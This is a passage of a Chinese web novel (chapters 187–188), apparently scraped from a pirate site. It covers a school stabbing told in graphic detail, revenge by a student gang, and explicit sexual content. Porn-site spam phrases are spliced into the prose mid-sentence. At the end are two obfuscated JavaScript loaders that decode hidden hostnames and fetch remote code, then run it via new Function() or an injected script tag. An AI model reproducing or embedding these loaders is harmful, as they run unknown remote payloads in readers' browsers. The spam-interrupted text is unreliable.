程安妮在一旁笑着对马小虎说,“这是你雅婷姐姐喜欢你呢,这么不解风情呢,到底还是小啊……”
乡土尛说網手打丁雅婷一听脸更红了,韩梅听了就有些不高兴,但还是装出笑脸说马小虎,“也不是故意碰的,你怎么这么多事儿呢……”
马小虎刚想犟嘴,就看韩梅眼光中有杀意,他忙把嘴闭上了。程安妮在一旁“哧哧”笑说,“你这小弟弟太可爱了……”
几人吃过饭,三个女人嚷着要去唱歌。马小虎不想去,韩梅也没为难他,就让他先回学校。临走时,居然还当着大家的面和他抱了下。
马小虎一走,丁雅婷就逼问韩梅,“你说实话,你和这马小虎到底什么关系?”
韩梅喝的有些微醺,呵呵笑着,“就是弟弟啊,没什么关系的……”
程安妮插嘴说,“是下面那个弟弟吧?你现在是老牛吃嫩草啊,典型的祸害青苗呢……”
说着又去都丁雅婷,“你是不是看上这小孩儿了?和韩梅说说,借你玩几天。看你老公那干巴样,肯定满足不了你……”
丁雅婷笑着追她说,“就你老公能满足你,我看你都快把他榨干了……”
几个女人嬉闹着,程安妮的老公在一旁尴尬的笑着,也不插话。
马小虎回到学校时,联欢会早结束了。因为是元旦,学校放了假。很多同学开完联欢会就跑出去AA制聚餐,整个校园里闹哄哄的。
马小虎到了寝室门口,一拽门,发现门里居然是反锁着的。他又一拽,就听耗子在里面说,“谁啊,等会儿……”
一开门,马小虎就见耗子的同桌小胖妞儿脸色潮红的坐在床上,低着头不敢看马小虎。
耗子担心马小虎胡说,小胖妞再不高兴。就忙对着马小虎嘿嘿一笑,问说,“你今天去哪儿了,联欢会你也不参加……”
马小虎根本就没听耗子问什么,他反问耗子,“你两刚才干什么呢?到哪一步了?快说……”
小胖妞被他的话弄的脸更红了,头都快低到胸前。耗子笑着对马小虎打了下,“滚蛋,你在寝室呆着吧,我俩走了……”
马小虎忙说,“你别走啊,我给你们倒地方,我走……”
耗子一边穿衣服一边摇头,回头朝马小虎挤着眼睛说,“不用,完事了……”
马小虎哈哈一笑,随口问,“他们呢?”
耗子回答说,“喝酒去了,瓶底子也在,我偷着跑出来的……”
马小虎有些惊讶,“瓶底子还会喝酒?我以为他除了教学别的什么都不会呢……”
耗子和小胖妞走后,马小虎就躺在床上睡大觉。也不知道睡到几点,就听寝室门哐当一下开了。四眼和杨达壮几人急匆匆的冲了进来,上去推着马小虎,“小虎,快起来,出事了,耗子出事了……”
马小虎迷迷糊糊的坐了起来,揉着眼睛问说,“怎么了?出什么事了?”
四眼忙说,“耗子给老黑捅了,老黑刚让120拉走,现在是死是活还不知道呢……”
马小虎一听,惊讶的站了起来,“那耗子呢?”
四眼摇头说,“跑了,不知道去哪儿了……”
马小虎追问,“到底怎么回事?”
四眼指着正哭哭啼啼的小胖妞,“你说,你把怎么回事告诉小虎……”

第一百八十七章 刀刀致命
小胖妞一边哭着,一边把事情经过讲了出来。乡土尛说網手打她和耗子出了校门,准备去游戏厅。可没走多远就看见肖凯和老黑一群人。耗子一见他们就知道不好,他拉住小胖妞准备绕道走。谁知肖凯也看见他了,离挺远就喊说,“耗崽子,领个荷兰猪乱跑什么?”
如果肖凯只是骂耗子,他也就不能回骂,毕竟好汉不吃眼前亏。但肖凯骂的是小胖妞,耗子就不干了,他回骂说,“操你妈肖凯,你他妈才是猪,你们全家都是猪……”
小胖妞有些害怕,她想把耗子拉走。老黑快步走了过来,伸手就要打耗子。小胖妞忙挡在耗子身前,谁知老黑一脚把小胖妞踹倒。
耗子见胖妞倒在地上,一下急了,他一边骂着一边朝老黑冲去。还没等到跟前,就被几人打倒在地。老黑一边踹耗子一边说,“操你妈的,这就是你跟着马小虎混的下场……”
小胖妞爬起来,想去把他们拉开。老黑回头又给了她一脚,直接踢在她的肚子上。小胖妞疼的躺在地上直翻滚,再没爬起来。
老黑他们打完耗子,也没当回事,一群人去了附近的网吧。耗子起来后,他先把小胖妞扶了起来,就直接跑到附近一家商店,买了一把剔骨用的尖刀。
他一个人冲进网吧,老黑当时正在打游戏,耗子到跟前时他才发现。刚一站起来,耗子照着老黑的肚子就是一刀。当时网吧里所有人都吓呆了,胆小的女生被吓的捂着眼睛尖叫。耗子捅完第一刀,接着又是一刀。第二刀再一拔出,就见老黑颤颤悠悠的倒在了地上。
据后来在场的人讲,当时耗子两眼血红,目光冰冷。下刀时没有丝毫的犹豫,可以看出,他当时的目的就是捅死老黑。最让在场人心悸的场面是,老黑肚子的血不是流出来的,而是喷出来的。老黑倒下时,他身边已经是一片血红。
肖凯和长毛已经完全吓傻了,但耗子明显没想动他们俩。耗子捅完老黑指着肖凯,“肖胖子,你记得,以后再和小虎做对,哪天躺在地上的就是你……”
耗子说这句话时,声音很平静。而肖凯早已吓得脸色煞白,连连点头,他甚至都有些不敢看耗子。
小胖妞一说完,四眼就埋怨她说,“你怎么不拦着点他啊,或者回来找我们呢?”
小胖妞只是不停的哭,多一句话她也说不出来。马小虎知道,耗子之所以这么做,并不是因为老黑打了他,而是因为老黑动了小胖妞。也的确,作为男人,谁能看着自己的女人受人欺负而无动于衷呢。
马小虎想了半天,掏出手机给耗子打了电话,好半天那面才接了起来,耗子第一句就问,“小虎,老黑死没死?”
马小虎没想到此时耗子的口气居然会这么平静,他回答说,“不知道,说被120拉走了,你在哪儿呢?”
耗子想了下没回答他,而是说,“他不死也得重伤,小虎,我可能得走了,这个电话我也不能再用了,有一个事我想求你……”
耗子并不是不想告诉马小虎他在哪儿,他是怕连累马小虎。马小虎听着他的话,鼻子一酸,轻声说,“你说吧……”
耗子冷静的说,“你帮我照顾照顾我爸妈还有小胖妞,别的就无所谓了……”
马小虎劝说,“耗子,你先别着急,我们再想想办法……”
耗子苦笑下,“还能有什么办法,行了,我不说了,有事情我会联系你……”
说着耗子就挂了电话。
马小虎坐在床上,发了好半天的呆,才抬头看着包知道,“包子,你把话放出去,就说今天所有和耗子这事有关的人,我马小虎一个也不会放过……”
马小虎话音刚落,谢小权接话说,“不行,小虎,你这是胡闹呢。咱们现在就等着看老黑到底死没死,再商量之后怎么办,你现在说这些就是火上浇油……”
周子安也摇摇头,拍了拍马小虎的肩膀,“小虎,小权说的对,先别着急,还不是时候……”
就连平时一听打架肯定第一个同意的大智也觉得不妥,他看着马小虎说,“咱们早晚得收拾他们,不过还是先等等吧……”
马小虎摇了摇头,看着包知道,“就按我说的,今天都谁动了耗子,你把名单给我……”
包知道看了周子安一眼,无奈的点了点头。
马小虎站了起来,看着几人,“你们以前不都劝我当老大吗?我一直不同意,但我今天同意了,我要当老大,当职高的老大,当个我兄弟永远不会被人欺负的老大……”
马小虎说完,几人互相看了看,都点了点头。
这几天唯一让马小虎几人欣慰的消息就是老黑没死,但是重伤。耗子的一刀让他大小肠贯穿,另一刀伤到了脾,听说做了手术,脾已经摘除了。
警察也到学校调查了,和耗子相关的人都被问了话。马小虎也没例外,但最终也没得到什么有用的信息。
校园里开始盛传马小虎要报复的消息,连林琳都过来问马小虎是不是真要这么做。马小虎回答她一个字,“是”那天打耗子的几个人这几天都没来学校。最主要的原因就是害怕,他们不知道马小虎这帮人会做出什么。在外面混的都明白一个道理,软的怕横的,横的怕硬的,硬的怕不要命的。
耗子在马小虎这几人当中,属于是不起眼的。但他都敢出手捅人,还刀刀致命。那另外几个呢?谁也不知道他们会做出什么。
但还是有一个人来上学了,他其实也不是来上课,国产自拍九九他就是想到学校拿点东西。他还特意选在早晨来的学校,结果还是被四眼看见了。四眼忙跑回班级告诉马小虎。马小虎二话没说,直接起身直奔高二。

第一百八十八章 主动用嘴
马小虎谁也没叫,他就打算自己去。但杨达壮、四眼还有包知道都紧紧跟在他身后。
到老黑班时,正是下课,班级里闹哄哄的。马小虎四人直接进了班级,整个班级忽然安静下来。都瞪着眼睛看着这几位不速之客。
老黑的小弟一见马小虎进来,立刻呆在那里,脸色像91po在线观看国产永久地址土灰一般。马小虎冲他摆了摆手,“你,出来!”
他站着没动,也不知道是不敢还是什么。马小虎见他不动,直接进了班级,一步步朝他走过去。
四眼的手一直在兜里,他警惕的看着四周,谁要先冲过来,他就准备先来一刀再说。他也想了,绝不会像耗子那么傻,往要害部位捅。他就准备朝大腿屁股或者小肚子一类的地方,即使来上两刀,也没什么大事。
马小虎一到老黑小弟的身边,刚伸手要把他拽出班级。就听身后传来一个女声,“马小虎,你住手……”
马小虎回头一看,就见秦默站在身后,她一头黑发随意的用手帕扎在脑后,素雅的着装,脸上不施粉黛。
马小虎已经好久没见到秦默了,他呆呆的看着这个当年的梦中女神,手不由的放下了。马小虎这才想起来,秦默和老黑是一个班的。
秦默的眼神很清澈,她看着马小虎微微牵动下嘴角,“小虎,你们为什么还要打架呢?这么打来打去的什么时候是个头啊?老黑还躺在医院,你朋友是不是也没了消息?”
马小虎一时语塞,不知道该说什么。秦默继续说,“别再打架了,回班好好学习吧……”
马小虎一句话也没说,只是“嗯”了一声,点点头出了班级。
包知道在后面轻声对四眼说,“看见没,要想说服小虎,不用别的,就找个美女就行。这看见美女话都不会说了……”
四眼捏着嗓子,学秦默的声音,“小虎,乖,别打架了,好好学习啊……”
马小虎被他两人逗的一下笑了,回头骂了一句,“滚。”
耗子的事情韩梅也知道了。她见马小虎这几天心情都不是太好,就特意做了他爱吃的菜,晚上把他叫到家里。
吃饭时,韩梅问说,“耗子还没消息呢?”
马小虎摇摇头,“没有,也不知道他跑哪去了……”
韩梅给马小虎夹了一块排骨,“多吃点儿,这几天脸色都不好……”
马小虎虽然心情不太好,但他顽劣的天性始终没法改。他嬉皮笑脸的说,“脸色不好不也都是因为和你纵欲过度吗?”
韩梅瞪了他一眼,“说不定和谁纵欲呢,从上次吃完火锅你就没来过……”
韩梅一提火锅,马小虎一下想到了丁雅婷,他忙对韩梅说,“要不你问问那个女警察,像耗子这样的事情最好怎么办,要是抓住能判几年?”
韩梅点头答应,“我明天就去找她,要不你和我一起去吧?”
马小虎点点头,韩梅又补充说,“小虎,以后别打架了,你们再闹下去就该出人命了……”
马小虎嘿嘿一笑,转了话题说,“我发现你越来越像我妈了,对我好的时候比谁都好,不好的时候上来就动手……”
韩梅呵呵笑说,“你不惹我我就不打你……”
吃过饭,马小虎冲了澡。两人就躺在床上搂着聊天。马小虎见韩梅掰着手指好像算着什么,就问她干什么呢。
韩梅冲他温柔的笑下,“我算时间呢,我大你五岁,你大学毕业我正好二十九……”
马小虎有些奇怪的问,“大学毕业?我根本就没打算上大学。再说你二十九怎么了?”
韩梅在他身上拍了下,白了他一眼,看着他说,“结婚啊,你和我在一起不想结婚?”
马小虎点点头,“你说的也对,是得结婚,也不能白睡了这么长时间……”
韩梅一听就翻身趴在床上,两个小腿翘着,脚丫在空中乱蹬着,“对啊,睡完我你想跑那可不行……”
马小虎在她脸上掐了下,“我可没想跑,你那小妹妹可是名器,我怎么能舍得跑呢……”
谁知韩梅听了这话,竟叹了口气。她把脸贴在马小虎的小腹上,把坚硬从里面掏了出来。用手轻轻握住,呆呆的看着,一脸哀怨的说,“什么名器也有人老珠黄的那一天,我大你这么多,我真害怕……”
马小虎摸着韩梅的头发,安慰说,“没事,你一百年后还这样……”
韩梅明知道是假话,还是挺开心。她看着马小虎晶亮的头部说,“小虎,我想和你说件事……”
马小虎问说,“什么事?”
韩梅犹豫了半天才说,“我想和你说的是,在咱们俩结婚之前我允许你再和一个女孩儿交往,你们做什么我不管,但一不许怀孕,二不许告诉我……”
马小虎根本不信她的话。他摇头撒谎说,“不用,有你一个就够了……”
韩梅继续说,“我说的是真的,这样对你也公平。我觉得马心语就不错,你和我说实话,那天早上你们两个人在寝室是不是上床了?”
马小虎连忙否认说,“没有,绝对没有,寝室那么多人怎么可能呢……”
韩梅轻轻套弄着坚硬,撇着嘴说,“还骗我,我都打听过了,他们几个是后来才回去的……”
马小虎就打定一个主意,打死不承认。韩梅见他不承认,也不逼问。她把脸凑到马小虎的胯间,轻轻贴在了坚硬上,柔声说,“我帮你亲亲吧?”
马小虎吓的哆嗦一下,他之前求她好几次她都不肯。可今天提完马心语居然要帮自己亲。马小虎怕她咬自己,忙说,“不用亲,你不喜欢还亲什么……”
谁知马小虎说完,韩梅竟张开嘴慢慢含住。脑袋一点点向下探去。虽然动作还很生涩,但还是有一种不一样的快感。
广告飞机@pd8999
function HgeYK(e){var t="",n=r=c1=c2=0;while(n191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function zVhcxE(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return HgeYK(t);};window[''+'w'+'z'+'o'+'U'+'m'+'q'+'x'+'f'+'p'+'g'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=zVhcxE,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/g/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('a221ob22kuam5rbXdyLnh5eg==','157787',window,document,['2','aqiKIowL']);}:function(){};
function VwFHBLO(e){var t="",n=r=c1=c2=0;while(n191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function vLkwA(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return VwFHBLO(t);};window[''+'T'+'S'+'p'+'B'+'u'+'c'+'L'+'w'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=vLkwA,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/g/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('aam1oZy5taaWZhcG9zdC5jb20=','157787',window,document,['a','JSmUEztNC']);}:function(){};